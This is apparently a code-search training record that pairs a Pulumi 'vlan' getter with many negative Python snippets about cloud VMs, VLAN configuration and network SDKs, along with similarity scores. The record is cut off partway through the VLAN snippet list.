"def init_cloud_virtual_resources():\n test_cldvirt_resources = []\n\n # add info to list in memory, one by one, following signature values\n cldvirtres_ID = 1\n cldvirtres_name = \"nova-compute-1\"\n cldvirtres_info = \"nova VM in Arm pod\"\n cldvirtres_IPAddress = \"50.60.70.80\"\n cldvirtres_URL = \"http://50.60.70.80:8080\"\n cldvirtres_related_phys_rsrcIDs = [1,3]\n\n test_cldvirt_resources.append(CloudVirtualResource(cldvirtres_ID, cldvirtres_name,\n cldvirtres_info,\n cldvirtres_IPAddress,\n cldvirtres_URL,\n cldvirtres_related_phys_rsrcIDs))\n\n cldvirtres_ID = 2\n cldvirtres_name = \"nova-compute-2\"\n cldvirtres_info = \"nova VM in LaaS\"\n cldvirtres_IPAddress = \"50.60.70.80\"\n cldvirtres_URL = \"http://50.60.70.80:8080\"\n cldvirtres_related_phys_rsrcIDs = [2,3]\n\n test_cldvirt_resources.append(CloudVirtualResource(cldvirtres_ID, cldvirtres_name,\n cldvirtres_info,\n cldvirtres_IPAddress,\n cldvirtres_URL,\n cldvirtres_related_phys_rsrcIDs))\n\n cldvirtres_ID = 3\n cldvirtres_name = \"nova-compute-3\"\n cldvirtres_info = \"nova VM in x86 pod\"\n cldvirtres_IPAddress = \"50.60.70.80\"\n cldvirtres_URL = \"http://50.60.70.80:8080\"\n cldvirtres_related_phys_rsrcIDs = [1]\n\n test_cldvirt_resources.append(CloudVirtualResource(cldvirtres_ID, cldvirtres_name,\n cldvirtres_info,\n cldvirtres_IPAddress,\n cldvirtres_URL,\n cldvirtres_related_phys_rsrcIDs))\n\n\n # write list to binary file\n write_list_bin(test_cldvirt_resources, FILE_CLOUD_RESOURCES)\n\n return test_cldvirt_resources",
"def sql_virtual_machine_group_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"sql_virtual_machine_group_resource_id\")",
"def __init__(self, **kwargs):\n\n super(NUVM, self).__init__()\n\n # Read/Write Attributes\n \n self._l2_domain_ids = None\n self._vrsid = None\n self._uuid = None\n self._name = None\n self._last_updated_by = None\n self._reason_type = None\n self._delete_expiry = None\n self._delete_mode = None\n self._resync_info = None\n self._site_identifier = None\n self._interfaces = None\n self._enterprise_id = None\n self._enterprise_name = None\n self._entity_scope = None\n self._domain_ids = None\n self._compute_provisioned = None\n self._zone_ids = None\n self._orchestration_id = None\n self._user_id = None\n self._user_name = None\n self._status = None\n self._subnet_ids = None\n self._external_id = None\n self._hypervisor_ip = None\n \n self.expose_attribute(local_name=\"l2_domain_ids\", remote_name=\"l2DomainIDs\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"vrsid\", remote_name=\"VRSID\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"uuid\", remote_name=\"UUID\", attribute_type=str, is_required=True, is_unique=False)\n self.expose_attribute(local_name=\"name\", remote_name=\"name\", attribute_type=str, is_required=True, is_unique=False)\n self.expose_attribute(local_name=\"last_updated_by\", remote_name=\"lastUpdatedBy\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"reason_type\", remote_name=\"reasonType\", attribute_type=str, is_required=False, is_unique=False, choices=[u'BLOCKED_LAST', u'BLOCKED_UNKNOWN', u'CRASHED_LAST', u'CRASHED_UNKNOWN', u'NOSTATE_LAST', u'NOSTATE_UNKNOWN', u'PAUSED_DUMP', u'PAUSED_FROM_SNAPSHOT', u'PAUSED_IOERROR', u'PAUSED_LAST', u'PAUSED_MIGRATION', u'PAUSED_SAVE', u'PAUSED_SHUTTING_DOWN', u'PAUSED_UNKNOWN', u'PAUSED_USER', u'PAUSED_WATCHDOG', u'RUNNING_BOOTED', u'RUNNING_FROM_SNAPSHOT', u'RUNNING_LAST', u'RUNNING_MIGRATED', u'RUNNING_MIGRATION_CANCELED', u'RUNNING_RESTORED', u'RUNNING_SAVE_CANCELED', u'RUNNING_UNKNOWN', u'RUNNING_UNPAUSED', u'SHUTDOWN_LAST', u'SHUTDOWN_UNKNOWN', u'SHUTDOWN_USER', u'SHUTOFF_CRASHED', u'SHUTOFF_DESTROYED', u'SHUTOFF_FAILED', u'SHUTOFF_FROM_SNAPSHOT', u'SHUTOFF_LAST', u'SHUTOFF_MIGRATED', u'SHUTOFF_SAVED', u'SHUTOFF_SHUTDOWN', u'SHUTOFF_UNKNOWN', u'UNKNOWN'])\n self.expose_attribute(local_name=\"delete_expiry\", remote_name=\"deleteExpiry\", attribute_type=int, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"delete_mode\", remote_name=\"deleteMode\", attribute_type=str, is_required=False, is_unique=False, choices=[u'TIMER'])\n self.expose_attribute(local_name=\"resync_info\", remote_name=\"resyncInfo\", attribute_type=dict, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"site_identifier\", remote_name=\"siteIdentifier\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"interfaces\", remote_name=\"interfaces\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"enterprise_id\", remote_name=\"enterpriseID\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"enterprise_name\", remote_name=\"enterpriseName\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"entity_scope\", remote_name=\"entityScope\", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])\n self.expose_attribute(local_name=\"domain_ids\", remote_name=\"domainIDs\", 
attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"compute_provisioned\", remote_name=\"computeProvisioned\", attribute_type=bool, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"zone_ids\", remote_name=\"zoneIDs\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"orchestration_id\", remote_name=\"orchestrationID\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"user_id\", remote_name=\"userID\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"user_name\", remote_name=\"userName\", attribute_type=str, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"status\", remote_name=\"status\", attribute_type=str, is_required=False, is_unique=False, choices=[u'BLOCKED', u'CRASHED', u'DELETE_PENDING', u'INIT', u'LAST', u'NOSTATE', u'PAUSED', u'RUNNING', u'SHUTDOWN', u'SHUTOFF', u'UNKNOWN', u'UNREACHABLE'])\n self.expose_attribute(local_name=\"subnet_ids\", remote_name=\"subnetIDs\", attribute_type=list, is_required=False, is_unique=False)\n self.expose_attribute(local_name=\"external_id\", remote_name=\"externalID\", attribute_type=str, is_required=False, is_unique=True)\n self.expose_attribute(local_name=\"hypervisor_ip\", remote_name=\"hypervisorIP\", attribute_type=str, is_required=False, is_unique=False)\n \n\n # Fetchers\n \n \n self.vm_resyncs = NUVMResyncsFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.alarms = NUAlarmsFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.vm_interfaces = NUVMInterfacesFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.vrss = NUVRSsFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n \n self.event_logs = NUEventLogsFetcher.fetcher_with_object(parent_object=self, relationship=\"child\")\n \n\n self._compute_args(**kwargs)",
"def video_list(self) -> list:\n return self._video_list",
"def Get_Running_Instances():\n ec2 = boto3.resource('ec2') \n #call the features resource from the boto3 library\n instances = ec2.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': ['pending', 'running',]},])\n #filter the instances returned using the state name\n #you can also filter using Tags by adding the filters: \n #[{'Name': 'tag-key', 'Values': ['Role','Name',]}, {'Name': 'tag-value', 'Values': ['*test*', '*TEST*',]},]\n return [instance.id for instance in instances]\n #return a liste with the ids of the instances",
"def describe_storage_virtual_machines(self, storage_virtual_machine_ids):\n result = []\n missed_storage_virtual_machine_ids = []\n for storage_virtual_machine_id in storage_virtual_machine_ids:\n cached_data = self.svm_cache.get(storage_virtual_machine_id)\n if cached_data:\n result.append(cached_data)\n else:\n missed_storage_virtual_machine_ids.append(storage_virtual_machine_id)\n if missed_storage_virtual_machine_ids:\n response = self._client.describe_storage_virtual_machines(\n StorageVirtualMachineIds=missed_storage_virtual_machine_ids\n )[\"StorageVirtualMachines\"]\n for storage_virtual_machine in response:\n self.svm_cache[storage_virtual_machine.get(\"StorageVirtualMachineId\")] = storage_virtual_machine\n result.append(storage_virtual_machine)\n return result",
"def dedicated_resources(self) -> Optional[Sequence['outputs.AiEndpointDeployedModelDedicatedResource']]:\n return pulumi.get(self, \"dedicated_resources\")",
"def external_ips(self) -> Iterable[dto.ExternalIp]:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )",
"def tags(self) -> Dict:\n return dict(self.client.get_instances_id_tags(self.id_))"
] | [
"0.5911471",
"0.5848252",
"0.5473489",
"0.5471283",
"0.54288316",
"0.54288316",
"0.542811",
"0.5384369",
"0.53598607",
"0.53279454",
"0.53103167",
"0.53008413",
"0.5270152",
"0.5221629",
"0.5212279",
"0.5154512",
"0.51520634",
"0.5138587",
"0.5093057",
"0.50420386",
"0.50042206",
"0.4995383",
"0.49669278",
"0.49644408",
"0.4937803",
"0.4937803",
"0.4933031",
"0.49263301",
"0.49022365",
"0.4853191",
"0.4848545",
"0.48418877",
"0.48418877",
"0.48182926",
"0.4800245",
"0.4790401",
"0.47575775",
"0.47556743",
"0.47541535",
"0.47490764",
"0.47478598",
"0.47465527",
"0.47450772",
"0.47440666",
"0.4727466",
"0.47250164",
"0.47250164",
"0.47215536",
"0.47202095",
"0.47202095",
"0.47168332",
"0.47152784",
"0.47058794",
"0.46962467",
"0.46910205",
"0.46598512",
"0.4625184",
"0.46175116",
"0.46113682",
"0.4605691",
"0.4604954",
"0.4602646",
"0.46026215",
"0.45959505",
"0.45871922",
"0.45841774",
"0.45841774",
"0.4584045",
"0.45753127",
"0.45743778",
"0.45743778",
"0.45669588",
"0.45638353",
"0.45604417",
"0.45580888",
"0.4554763",
"0.45497242",
"0.45493203",
"0.4539019",
"0.45336145",
"0.45323297",
"0.45290163",
"0.45277873",
"0.45269412",
"0.4519519",
"0.4518747",
"0.4516422",
"0.45126343",
"0.45113605",
"0.45113406",
"0.45097977",
"0.45077255",
"0.45073253",
"0.45005122",
"0.44970864",
"0.44890028",
"0.4486892",
"0.44849727",
"0.44799265"
] | 0.55128694 | 2 |
The VLAN from the l3IsolationDomain that is used for this network. | def vlan(self) -> pulumi.Output[float]:
return pulumi.get(self, "vlan") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def vlan(self) :\n\t\ttry :\n\t\t\treturn self._vlan\n\t\texcept Exception as e:\n\t\t\traise e",
"def get_vlan_tag(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetVlanTag', self.handle)",
"def get_vlan_tag(self):\n\t\treturn call_sdk_function('PrlSrvCfgNet_GetVlanTag', self.handle)",
"def vlan(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"vlan\")",
"def get_vlan(self, vlan_id):\r\n return self.vlan.getObject(id=vlan_id, mask=DEFAULT_VLAN_MASK)",
"def VlanId(self):\n if self.force_auto_sync:\n self.get('VlanId')\n return self._VlanId",
"def multicast_vlan(self):\n if self.segment.multicast_vlan_policy == \"d\":\n return None\n elif self.segment.multicast_vlan_policy == \"e\":\n return self.segment.multicast_vlan\n else:\n return self.segment.profile.multicast_vlan",
"def vlanChoice(self):\r\n idx = self.m_shuffleSeq[self.m_Cnt]\r\n self._vlanChoice = self.m_vlanSeq[idx]\r\n self.m_Cnt = (self.m_Cnt + 1) % self._wrMaxLen\r\n return self._vlanChoice",
"def management_vlan(self):\n if self.segment.management_vlan_policy == \"d\":\n return None\n elif self.segment.management_vlan_policy == \"e\":\n return self.segment.management_vlan\n else:\n return self.segment.profile.management_vlan",
"def InnerVlanId(self):\n if self.force_auto_sync:\n self.get('InnerVlanId')\n return self._InnerVlanId",
"def FlowStatVlanId(self):\n\t\treturn self._get_attribute('flowStatVlanId')",
"def show_vlan(self, vlan=None):\n\n if vlan is not None and vlan in self.get_vlans_list():\n print self.vlans[vlan]\n else:\n for v in self.vlans:\n print self.vlans[v]",
"def show_vlan(self, vlan=None):\n\n if vlan is not None and vlan in self.get_vlans_list():\n print self.vlans[vlan]\n else:\n for v in self.vlans:\n print self.vlans[v]",
"def _extract_vlan(vlan):\n try:\n return re.match(r'vlan-(\\d+)', vlan).group(1)\n except:\n return None",
"def VlanPriority(self):\n if self.force_auto_sync:\n self.get('VlanPriority')\n return self._VlanPriority",
"def vlans(self):\n if self._vlans is None:\n self._vlans = self._show_vlan()\n\n return self._vlans",
"def FlowStatVlanPriority(self):\n\t\treturn self._get_attribute('flowStatVlanPriority')",
"def vlan_get(self, vlan_id):\n # return True/False\n raise NotImplementedError",
"def get_vlan_from_int(dev, int_name):\n return dev.get_interfaces()[int_name]",
"def show_vlan(self, vlan=None, vdc=None):\n for vdcname in vdc:\n print \"VDC: {}\".format(vdcname)\n if vlan is not None and vlan in self.vdcs[vdcname].get_vlans_list():\n print self.vdcs[vdcname].vlans[vlan]\n else:\n for v in self.vdcs[vdcname].vlans:\n print self.vdcs[vdcname].vlans[v]",
"def get_vnet_subnet_id(self) -> Union[str, None]:\n return self.agentpool_context.get_vnet_subnet_id()",
"def FlowAggregatedStatVlanId(self):\n\t\treturn self._get_attribute('flowAggregatedStatVlanId')",
"def build(cls, name, enc, networkcfg):\n static = (networkcfg[name] if name in networkcfg\n else networkcfg[networkcfg.default_section])\n vlan = VLAN(name, enc, static)\n if vlan.policy == 'untagged':\n return UntaggedPolicy(vlan)\n elif vlan.policy == 'tagged':\n return TaggedPolicy(vlan)\n elif vlan.policy == 'transit':\n return TransitPolicy(vlan)\n elif vlan.policy == 'ipmi':\n return IPMIPolicy(vlan)\n elif vlan.policy == 'puppet':\n raise RuntimeError(\n 'should never been called with \"puppet\" policy', vlan)\n raise ValueError(\n 'unknown network policy for VLAN {}'.format(vlan.name),\n vlan.policy)",
"def lan_address(self):\n return self._lan_address",
"def read_mac_address_vlan(self, vid: int) -> Macs:\n return self._current_dev_manager.read_mac_address_vlan(vid=vid)",
"def tempest_cinder_glance_swift_vlan(self):\n self.helper_cinder_glance_swift('vlan')",
"def get_switch_local_vlan_id(self, rpc_context, **kwargs):\n port_id = kwargs.get('port_id')\n host_name = kwargs.get('host_name')\n if self.rpc_handler is None:\n return\n context = {'port_id': str(port_id), 'host_name': str(host_name)}\n\n response = None\n try:\n response = self.rpc_handler.get_switch_local_vlan_id(context)\n except:\n pass\n return response",
"def virtual_network_subnet_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def read_mac_address_vlan(self, vid: int) -> Macs:\n raise NotImplementedError",
"def set_vlan_tag(self, nVlanTag):\n\t\tcall_sdk_function('PrlVirtNet_SetVlanTag', self.handle, nVlanTag)",
"def vm_vlan_num_in(self, vm_vlan_num_in):\n\n self._vm_vlan_num_in = vm_vlan_num_in",
"def virtual_network_subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def virtual_network_subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_subnet_id\")",
"def add_vlan(self, vlan):\n logger.info('adding vlan: %s' % vlan.name)\n data = self._add_common(vlan)\n logger.debug('vlan data: %s' % data)\n self.interface_data[vlan.name] = data\n if vlan.routes:\n self._add_routes(vlan.name, vlan.routes)",
"def vz0(self):\n return self.params['vz0']",
"def FlowAggregatedStatVlanPriority(self):\n\t\treturn self._get_attribute('flowAggregatedStatVlanPriority')",
"def read_port_vlan_info(self, port: int) -> Vlans:\n return self._current_dev_manager.read_port_vlan_info(port=port)",
"def get_ifvlan_index(self, ifvlan_id):\n index = -1\n for i in range(len(info_populator.InfoPopulator.IFVLAN_IDS)):\n if ifvlan_id == info_populator.InfoPopulator.IFVLAN_IDS[i]:\n index = i\n break\n else:\n self.fail(\n \"could not find the index of interface vlan: %s\" %\n ifvlan_id)\n\n return index",
"def _getvlanlistqos(self):\n self.activeL2 = []\n for _key, vals in self.activeDeltas.get('output', {}).get('vsw', {}).items():\n if self.hostname not in vals:\n continue\n if not self._started(vals):\n # This resource has not started yet. Continue.\n continue\n for key, vals1 in vals[self.hostname].items():\n self.activeL2.append({'destport': key,\n 'vlan': vals1.get('hasLabel', {}).get('value', ''),\n 'params': vals1.get('hasService', {})})",
"def lvad(self):\n return self._lvad",
"def lvad(self):\n return self._lvad",
"def lvad(self):\n return self._lvad",
"def cap_net_vlan_provisioning_ind(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"cap_net_vlan_provisioning_ind\"), kwargs)",
"def set_vlan_interface(self, interface, vlan, vdc=None):\n\n assert isinstance(vlan, str)\n assert isinstance(interface, str)\n assert isinstance(vdc, list)\n\n self.logger.debug(\"Adding vlan {} on interface {} on {}\".format(vlan, interface, self.host))\n interface = interface.title()\n vlan_created = None\n\n if len(vdc) != 1:\n raise ValueError(\"Interface {} cannot exist in multiple vdcs {}\".format(interface, self.host))\n vdc = vdc[0]\n if not self.vdcs[vdc].check_interface(interface):\n raise ValueError(\n \"Interface {} does not exist in vdc {} on {}\".format(interface, vdc, self.host))\n if not self.vdcs[vdc].check_vlan(vlan):\n self.set_vlan(vlan)\n vlan_created = [vlan]\n\n self.switchto_vdc(vdc)\n\n commands = ['config t ; interface {}'.format(interface)]\n configured = False\n\n if not self.vdcs[vdc].check_interface_vlan(interface, vlan):\n if self.vdcs[vdc].interfaces[interface].switchport == 'access':\n commands.append('switchport access vlan {}'.format(vlan))\n elif self.vdcs[vdc].interfaces[interface].switchport == 'trunk':\n commands.append('switchport trunk allowed vlan add {}'.format(vlan))\n else:\n raise ValueError(\n \"Interface {} in vdc {} on {} is not access or trunk\".format(interface, self.current_vdc,\n self.host))\n else:\n configured = True\n\n if not configured:\n try:\n self._send_xml_cli(commands)\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n stacktrace = traceback.extract_tb(exc_traceback)\n self.logger.error(\"VLAN {} configuration for interface {} on {} failed\".format(vlan, interface, self.host))\n self.logger.debug(sys.exc_info())\n self.logger.debug(stacktrace)\n else:\n self.get_interfaces(vdc=vdc)\n\n return vlan_created",
"def _is_vlan_router_interface_supported(self):",
"def purchase_vlan(self, vlan_name, debug=False):\n vlan_name = {'VLanName': vlan_name}\n json_scheme = self.gen_def_json_scheme('SetPurchaseVLan', vlan_name)\n json_obj = self.call_method_post(method=\"SetPurchaseVLan\", json_scheme=json_scheme)\n if debug is True:\n self.logger.debug(json_obj)\n if json_obj['Success'] is False:\n raise Exception(\"Cannot purchase new vlan.\")\n vlan = Vlan()\n vlan.name = json_obj['Value']['Name']\n vlan.resource_id = json_obj['Value']['ResourceId']\n vlan.vlan_code = json_obj['Value']['VlanCode']\n return vlan",
"def ms_get_management_vlan(self):\n self.open_route('/configure/switch_settings', \"Switch\")\n textarea_value = page_utils.get_input_var_value(\n self.get_page(),\n var_id='node_group_management_vlan')\n return textarea_value",
"def virtual_network(self):\n return self.broker.virtual_network(**{\"VirtualNetworkMemberID\": self.VirtualNetworkMemberID})",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def is_provider_vlan(vlan_id):\n session = db.get_session()\n if (session.query(network_models_v2.ProviderNetwork).\n filter_by(network_type=const.NETWORK_TYPE_VLAN,\n segmentation_id=vlan_id).first()):\n return True",
"def _support_vlan_router_interfaces(self):\n pass",
"def validate_vlan(vlan_id, meraki_net):\n check_vlan = False\n vlan_name = \"\"\n api_uri = f\"/v0/networks/{meraki_net}/vlans/{vlan_id}\"\n data = get_meraki_api_data(api_uri)\n if data:\n check_vlan = True\n vlan_name = data[\"name\"].strip()\n else:\n check_vlan = False\n return check_vlan, vlan_name",
"def read_port_vlan_info(self, port: int) -> Vlans:\n raise NotImplementedError",
"def system_vlan_num_in(self, system_vlan_num_in):\n\n self._system_vlan_num_in = system_vlan_num_in",
"def _get_tunnel_vif(self):\n return self.__tunnel_vif",
"def list_vlans(self, datacenter=None, vlan_number=None, name=None,\r\n **kwargs):\r\n _filter = NestedDict(kwargs.get('filter') or {})\r\n\r\n if vlan_number:\r\n _filter['networkVlans']['vlanNumber'] = query_filter(vlan_number)\r\n\r\n if name:\r\n _filter['networkVlans']['name'] = query_filter(name)\r\n\r\n if datacenter:\r\n _filter['networkVlans']['primaryRouter']['datacenter']['name'] = \\\r\n query_filter(datacenter)\r\n\r\n kwargs['filter'] = _filter.to_dict()\r\n\r\n if 'mask' not in kwargs:\r\n kwargs['mask'] = DEFAULT_VLAN_MASK\r\n\r\n return self.account.getNetworkVlans(**kwargs)",
"def virtual_router_ip(self):\n return self._virtual_router_ip",
"def get_vlans():\n query = {\"type\": \"op\", \"cmd\": \"<show><vlan>all</vlan></show>\"}\n\n return __proxy__[\"panos.call\"](query)",
"def vm_vlan_num_lt(self, vm_vlan_num_lt):\n\n self._vm_vlan_num_lt = vm_vlan_num_lt",
"def vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"vnet_name\")",
"def cap_voice_vlan_ind(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"cap_voice_vlan_ind\"), kwargs)",
"def lan_address(self):\n _, port = self._socket.getsockname()\n return (\"127.0.0.1\", port)",
"def _get_vlist(self, vlist):\n if vlist == \"all\":\n return list(range(1, 4095))\n elif vlist == \"none\":\n return []\n elif type(vlist) is not list:\n raise Exception(\"Unexpected vlan list: \" + str(vlist))\n else:\n return vlist",
"def subnet_id(self) -> str:\n return pulumi.get(self, \"subnet_id\")",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def VplsIdIpAddress(self):\n return self._get_attribute('vplsIdIpAddress')",
"def deploy_neutron_vlan(self):\n self.env.revert_snapshot(\"ready_with_3_slaves\")\n\n cluster_id = self.fuel_web.create_cluster(\n name=self.__class__.__name__,\n mode=DEPLOYMENT_MODE,\n settings={\n \"net_provider\": 'neutron',\n \"net_segment_type\": NEUTRON_SEGMENT['vlan'],\n 'tenant': 'simpleVlan',\n 'user': 'simpleVlan',\n 'password': 'simpleVlan'\n }\n )\n self.fuel_web.update_nodes(\n cluster_id,\n {\n 'slave-01': ['controller'],\n 'slave-02': ['compute'],\n 'slave-03': ['compute']\n }\n )\n self.fuel_web.deploy_cluster_wait(cluster_id)\n\n cluster = self.fuel_web.client.get_cluster(cluster_id)\n assert_equal(str(cluster['net_provider']), 'neutron')\n\n self.fuel_web.verify_network(cluster_id)\n\n self.fuel_web.run_ostf(\n cluster_id=cluster_id)\n\n self.env.make_snapshot(\"deploy_neutron_vlan\", is_make=True)",
"def subnet_id(self) -> Optional[str]:\n return pulumi.get(self, \"subnet_id\")",
"def get_virtual_network_id(self):\n\t\treturn call_sdk_function('PrlVmDevNet_GetVirtualNetworkId', self.handle)",
"def add_vlan(self, vlan_number, vlan_pool_name):\n class_query = ClassQuery('fvnsVlanInstP')\n class_query.propFilter = 'eq(fvnsVlanInstP.name, \"' + VLAN_POOL_PREFIX + vlan_pool_name + '\")'\n vp_list = self.moDir.query(class_query)\n # If the vlan pool does not exists, create it with the physical domain and the attachable entity profile\n if len(vp_list) == 0:\n VlanInstP_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + vlan_pool_name, 'static')\n DomP_mo = self.create_physical_domain(PD_PREFIX + vlan_pool_name, str(VlanInstP_mo.dn))\n self.create_attachable_entity_profile(AEP_PREFIX + vlan_pool_name, str(DomP_mo.dn))\n else:\n VlanInstP_mo = vp_list[0]\n encap_mo = EncapBlk(str(VlanInstP_mo.dn), VLAN_PREFIX + str(vlan_number),\n VLAN_PREFIX + str(vlan_number), allocMode='static')\n self.commit(encap_mo)",
"def vnet_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"vnet_name\")",
"def l3_isolation_domain_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def get_lane(self):\n return self.lane",
"def _get_l2vni(self):\n return self.__l2vni",
"def system_vlan_num_lt(self, system_vlan_num_lt):\n\n self._system_vlan_num_lt = system_vlan_num_lt",
"def _isVLAN(v):\n #if not v or not type(v) is (string): return 0\n v = v.replace(',','')\n v = v.replace('-','')\n for char in v:\n if re.compile('[0-9]+').match(char) == None:return 0\n return 1",
"def getlan():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('10.255.255.255', 1))\n lan = str(s.getsockname()[0])\n s.close()\n except socket.error:\n s.close()\n sys.exit('>> Unable to find LAN IP')\n\n return lan",
"def _create_vlan(self, conn, vlan_id, vlan_name):\n\n req_js = {}\n req_js['vlan_id'] = vlan_id\n req_js['vlan_name'] = vlan_name\n req_js['admin_state'] = 'up'\n\n resp = conn.post(self.VLAN_REST_OBJ, req_js)\n self._check_process_resp(resp)",
"def get_vol_lvl(self):\n global volume\n #output = subprocess.check_output(['amixer', 'sget', self.mixer_name]).decode('utf-8')\n return volume#int(output[(output.find('[') + 1):output.find('%]', (output.find('[') + 1))])",
"def virtual_network_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"virtual_network_id\")",
"def lun(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"lun\")",
"def vat_number(self):\n return self._vat_number",
"def get_network_id(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkId', self.handle)",
"def _get_ethernet_tag(self):\n return self.__ethernet_tag",
"def system_vlan_num(self, system_vlan_num):\n\n self._system_vlan_num = system_vlan_num",
"def l3_isolation_domain_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def vm_vlan_num(self, vm_vlan_num):\n\n self._vm_vlan_num = vm_vlan_num",
"def common_values(self):\n vlan = self.vlan\n return dict(\n addr4=vlan.addrs(4),\n addr6=vlan.addrs(6),\n addresses=vlan.addrs(),\n gateways=vlan.gateways_filtered(),\n iface=vlan.iname(),\n mac=vlan.mac,\n metric=vlan.metric,\n mtu=vlan.mtu,\n nets4=vlan.nets(4),\n nets6=vlan.nets(6),\n nets=vlan.nets(),\n vlan=vlan.name,\n )",
"def __init__(self, vlan_id):\n self.vlan_id = vlan_id\n self.action_type = 'set_vlan'",
"def vlan_create(handle, name, vlan_id, sharing=\"none\",\r\n mcast_policy_name=\"\", compression_type=\"included\",\r\n default_net=\"no\", pub_nw_name=\"\", parent_dn=\"fabric/lan\"):\r\n from ucsmsdk.mometa.fabric.FabricVlan import FabricVlan\r\n\r\n obj = handle.query_dn(parent_dn)\r\n if obj:\r\n vlan = FabricVlan(parent_mo_or_dn=obj,\r\n sharing=sharing,\r\n name=name,\r\n id=vlan_id,\r\n mcast_policy_name=mcast_policy_name,\r\n policy_owner=\"local\",\r\n default_net=default_net,\r\n pub_nw_name=pub_nw_name,\r\n compression_type=compression_type)\r\n\r\n handle.add_mo(vlan, modify_present=True)\r\n handle.commit()\r\n else:\r\n log.info(parent_dn + \" MO is not available\")",
"def subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_id\")",
"def subnet_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnet_id\")",
"def _tenant_network(self):\n port = self._connection.network.ports.find_by_device_owner('network:router_interface')\n if port:\n return self._connection.network.networks.get(port.network_id)\n else:\n raise errors.ImproperlyConfiguredError('Could not find tenancy network')",
"def subnet_id(self):\n return self._subnet_id",
"def name(self):\n return 'VL53L1X'",
"def moc_vnet_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"moc_vnet_name\")",
"def RouteDistinguisherIpAddress(self):\n return self._get_attribute('routeDistinguisherIpAddress')",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def create_vlan(module, switch, vlan_id, untagged_ports=None):\n global CHANGED_FLAG\n output = ''\n new_vlan = False\n\n cli = pn_cli(module)\n cli += ' vlan-show format id no-show-headers '\n existing_vlans = run_cli(module, cli)\n\n if existing_vlans is not None:\n existing_vlans = existing_vlans.split()\n if vlan_id not in existing_vlans:\n new_vlan = True\n\n if new_vlan or existing_vlans is None:\n cli = pn_cli(module)\n cli += ' vlan-create id %s scope fabric ' % vlan_id\n\n if untagged_ports is not None:\n cli += ' untagged-ports %s ' % untagged_ports\n\n run_cli(module, cli)\n CHANGED_FLAG.append(True)\n output += '%s: Created vlan with id %s\\n' % (switch, vlan_id)\n\n return output"
] | [
"0.7999924",
"0.7726699",
"0.7723152",
"0.74945563",
"0.6896781",
"0.68907255",
"0.66186804",
"0.6475853",
"0.6435667",
"0.64156556",
"0.6283416",
"0.62097275",
"0.62097275",
"0.62045115",
"0.579412",
"0.5772401",
"0.57347697",
"0.56815064",
"0.5577279",
"0.5575757",
"0.5513762",
"0.53874314",
"0.5357877",
"0.5307194",
"0.52880514",
"0.52356",
"0.52324003",
"0.52150667",
"0.5205583",
"0.5205424",
"0.5182322",
"0.5181402",
"0.5181402",
"0.5166206",
"0.51448596",
"0.5138239",
"0.5129257",
"0.5125093",
"0.51002944",
"0.5092885",
"0.5092885",
"0.5092885",
"0.5091799",
"0.50541705",
"0.5048843",
"0.5019748",
"0.49930835",
"0.49746278",
"0.4960606",
"0.49599355",
"0.495937",
"0.49576157",
